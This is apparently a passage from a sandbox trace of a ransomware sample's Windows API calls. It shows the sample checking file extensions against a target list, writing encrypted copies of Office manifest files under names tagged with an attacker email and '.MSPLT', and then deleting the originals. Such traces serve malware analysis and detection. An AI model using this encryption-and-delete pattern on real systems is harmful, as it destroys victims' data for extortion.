lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.205] lstrlenW (lpString=".docx") returned 5 [0177.205] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.206] lstrlenW (lpString=".pdf") returned 4 [0177.206] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString=".xls") returned 4 [0177.206] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString=".xlsx") returned 5 [0177.206] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.206] lstrlenW (lpString=".ppt") returned 4 [0177.206] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.206] lstrlenW (lpString=".zip") returned 4 [0177.206] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.206] lstrlenW (lpString=".rar") returned 4 [0177.206] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString=".bz2") returned 4 [0177.206] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString=".7z") returned 3 [0177.206] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.206] lstrlenW (lpString=".dbf") returned 4 [0177.206] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.206] lstrlenW (lpString=".1cd") returned 4 [0177.206] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml") returned 104 [0177.206] lstrlenW (lpString=".jpg") returned 4 [0177.206] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.206] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.206] lstrlenW (lpString="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 53 [0177.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.207] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0177.207] CloseHandle (hObject=0x384) returned 1 [0177.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0177.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.207] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.207] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0177.208] GetLastError () returned 0x0 [0177.208] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0177.210] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0177.211] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0177.211] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0177.211] SetEndOfFile (hFile=0x2fc) returned 1 [0177.211] CloseHandle (hObject=0x2fc) returned 1 [0177.212] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.212] SetEndOfFile (hFile=0x384) returned 1 [0177.213] CloseHandle (hObject=0x384) returned 1 [0177.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.214] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 1 [0177.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.214] lstrlenW (lpString=".doc") returned 4 [0177.214] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.214] lstrlenW (lpString=".docx") returned 5 [0177.214] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.214] lstrlenW (lpString=".pdf") returned 4 [0177.214] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.214] lstrlenW (lpString=".xls") returned 4 [0177.214] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.214] lstrlenW (lpString=".xlsx") returned 5 [0177.214] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.214] lstrlenW (lpString=".ppt") returned 4 [0177.214] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.214] lstrlenW (lpString=".zip") returned 4 [0177.214] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.214] lstrlenW (lpString=".rar") returned 4 [0177.215] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString=".bz2") returned 4 [0177.215] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString=".7z") returned 3 [0177.215] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString=".dbf") returned 4 [0177.215] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString=".1cd") returned 4 [0177.215] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString=".jpg") returned 4 [0177.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString=".doc") returned 4 [0177.215] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString=".docx") returned 5 [0177.215] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.215] lstrlenW (lpString=".pdf") returned 4 [0177.215] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString=".xls") returned 4 [0177.215] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString=".xlsx") returned 5 [0177.215] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.215] lstrlenW (lpString=".ppt") returned 4 [0177.215] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.215] lstrlenW (lpString=".zip") returned 4 [0177.215] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.215] lstrlenW (lpString=".rar") returned 4 [0177.215] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.216] lstrlenW (lpString=".bz2") returned 4 [0177.216] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.216] lstrlenW (lpString=".7z") returned 3 [0177.216] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.216] lstrlenW (lpString=".dbf") returned 4 [0177.216] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.216] lstrlenW (lpString=".1cd") returned 4 [0177.216] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0177.216] lstrlenW (lpString=".jpg") returned 4 [0177.216] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.217] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.217] lstrlenW (lpString="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 53 [0177.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.217] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=1261) returned 1 [0177.217] CloseHandle (hObject=0x384) returned 1 [0177.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 0x220 [0177.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.224] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.224] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0177.224] GetLastError () returned 0x0 [0177.224] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x4ed, lpOverlapped=0x0) returned 1 [0177.226] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x4f0, lpOverlapped=0x0) returned 1 [0177.227] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0177.227] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0177.228] SetEndOfFile (hFile=0x2fc) returned 1 [0177.228] CloseHandle (hObject=0x2fc) returned 1 [0177.229] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.229] SetEndOfFile (hFile=0x384) returned 1 [0177.230] CloseHandle (hObject=0x384) returned 1 [0177.230] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.230] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 1 [0177.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.230] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.230] lstrlenW (lpString=".doc") returned 4 [0177.230] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.230] lstrlenW (lpString=".docx") returned 5 [0177.230] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.230] lstrlenW (lpString=".pdf") returned 4 [0177.230] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.230] lstrlenW (lpString=".xls") returned 4 [0177.230] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString=".xlsx") returned 5 [0177.231] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.231] lstrlenW (lpString=".ppt") returned 4 [0177.231] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString=".zip") returned 4 [0177.231] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.231] lstrlenW (lpString=".rar") returned 4 [0177.231] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString=".bz2") returned 4 [0177.231] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString=".7z") returned 3 [0177.231] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString=".dbf") returned 4 [0177.231] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString=".1cd") returned 4 [0177.231] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString=".jpg") returned 4 [0177.231] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.231] lstrlenW (lpString=".doc") returned 4 [0177.231] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.231] lstrlenW (lpString=".docx") returned 5 [0177.231] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.232] lstrlenW (lpString=".pdf") returned 4 [0177.232] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.232] lstrlenW (lpString=".xls") returned 4 [0177.232] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.232] lstrlenW (lpString=".xlsx") returned 5 [0177.232] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.232] lstrlenW (lpString=".ppt") returned 4 [0177.232] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.232] lstrlenW (lpString=".zip") returned 4 [0177.232] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.232] lstrlenW (lpString=".rar") returned 4 [0177.232] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.232] lstrlenW (lpString=".bz2") returned 4 [0177.232] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.232] lstrlenW (lpString=".7z") returned 3 [0177.232] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.232] lstrlenW (lpString=".dbf") returned 4 [0177.233] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.233] lstrlenW (lpString=".1cd") returned 4 [0177.233] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 104 [0177.233] lstrlenW (lpString=".jpg") returned 4 [0177.233] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.233] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.233] lstrlenW (lpString="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 53 [0177.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.233] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=2147) returned 1 [0177.233] CloseHandle (hObject=0x384) returned 1 [0177.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 0x220 [0177.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0177.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0177.234] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.234] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0177.234] GetLastError () returned 0x0 [0177.234] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x863, lpOverlapped=0x0) returned 1 [0177.237] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x870, lpOverlapped=0x0) returned 1 [0177.238] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0177.238] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13e, lpOverlapped=0x0) returned 1 [0177.238] SetEndOfFile (hFile=0x2fc) returned 1 [0177.238] CloseHandle (hObject=0x2fc) returned 1 [0177.242] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0177.242] SetEndOfFile (hFile=0x384) returned 1 [0177.243] CloseHandle (hObject=0x384) returned 1 [0177.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.243] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 1 [0177.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.243] lstrlenW (lpString=".doc") returned 4 [0177.243] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.243] lstrlenW (lpString=".docx") returned 5 [0177.243] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.244] lstrlenW (lpString=".pdf") returned 4 [0177.244] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString=".xls") returned 4 [0177.244] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString=".xlsx") returned 5 [0177.244] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.244] lstrlenW (lpString=".ppt") returned 4 [0177.244] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0177.244] lstrlenW (lpString=".zip") returned 4 [0177.244] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.244] lstrlenW (lpString=".rar") returned 4 [0177.244] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned 